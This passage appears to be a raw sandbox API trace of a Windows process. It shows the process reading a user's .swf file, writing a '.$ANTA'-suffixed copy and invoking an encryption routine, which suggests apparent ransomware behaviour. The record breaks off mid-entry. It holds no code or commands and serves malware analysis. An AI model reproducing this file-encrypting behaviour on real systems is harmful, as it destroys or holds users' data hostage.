RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0105.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0105.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0105.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0105.591] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\Hf dn4y4LLHbc.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\hf dn4y4llhbc.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0105.592] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.592] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e550 | out: lpNewFilePointer=0x0) returned 1 [0105.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0105.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0105.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0105.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0105.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0105.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0105.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0105.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0105.592] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0105.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0105.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0105.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0105.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0105.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0105.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0105.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0105.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0105.592] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0105.593] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0105.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0105.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0105.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0105.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0105.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0105.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0105.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0105.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0105.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0105.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0105.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0105.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0105.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0105.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0105.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0105.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0105.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0105.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0105.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0105.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0105.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0105.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0105.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0105.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0105.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0105.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0105.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0105.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x43ec8f0 [0105.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0105.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7f98 [0105.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0105.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7cf8 [0105.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ec8f0 | out: hHeap=0x1780000) returned 1 [0105.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0105.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0105.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0105.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0105.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0105.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7f98 | out: hHeap=0x1780000) returned 1 [0105.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0105.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0105.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0105.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0105.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7860 [0105.594] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx")) returned 0x10 [0105.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7860 | out: hHeap=0x1780000) returned 1 [0105.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0105.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7cf8 | out: hHeap=0x1780000) returned 1 [0105.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0105.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0105.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0105.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0105.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0105.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0105.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0105.595] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\Hf dn4y4LLHbc.swf.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\hf dn4y4llhbc.swf.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0105.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0105.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0105.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0105.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0105.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0105.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0105.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0105.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0105.595] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0105.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0105.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0105.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0105.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0105.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0105.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0105.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0105.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0105.596] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0105.596] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0105.596] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0105.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0105.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0105.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0105.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0105.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0105.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0105.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0105.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0105.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0105.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0105.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0105.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0105.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0105.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0105.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e02020 [0105.599] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e5a0 | out: lpNewFilePointer=0x0) returned 1 [0105.599] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0x10000, lpOverlapped=0x0) returned 1 [0105.601] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0xd75, lpOverlapped=0x0) returned 1 [0105.601] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0x0, lpOverlapped=0x0) returned 1 [0105.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0105.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0105.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0105.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0105.601] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10d75) returned 0x4516010 [0105.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e02020 | out: hHeap=0x1780000) returned 1 [0105.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0105.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0105.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0105.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0105.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0105.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10d75) returned 0x4526d90 [0105.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0105.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0105.604] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0105.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0105.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0105.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0105.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0105.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10d75) returned 0x4516010 [0105.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0105.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0105.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0105.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0105.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0105.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0105.605] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0105.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0105.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0105.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0105.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0105.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0105.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0105.605] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0105.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0105.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0105.605] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0105.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0105.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0105.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0105.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a70 [0105.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0105.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0105.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0105.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0105.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10d75) returned 0x4516010 [0105.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0105.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2960 [0105.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0105.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0105.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0105.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a90 [0105.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0105.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0105.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0105.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2aa0 [0105.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0105.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0105.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0105.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad18 [0105.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0105.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0105.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0105.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0105.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0105.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10d75) returned 0x4537b10 [0105.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0105.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0105.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0105.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0105.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0105.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0105.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0105.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0105.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0105.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0105.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0105.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0105.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0105.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0105.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0105.607] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0105.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0105.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0105.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0105.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0105.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac9c0 [0105.607] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0105.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0105.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0105.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0105.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0105.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0105.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0105.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0105.607] RtlAllocateHeap 